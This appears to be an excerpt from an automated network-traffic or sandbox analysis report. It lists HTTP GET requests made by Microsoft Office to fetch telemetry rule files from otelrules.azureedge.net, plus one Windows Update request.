        Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VRr5F+7gkvM5Kss&MD=Oh6bxDDd HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
        Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
        Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
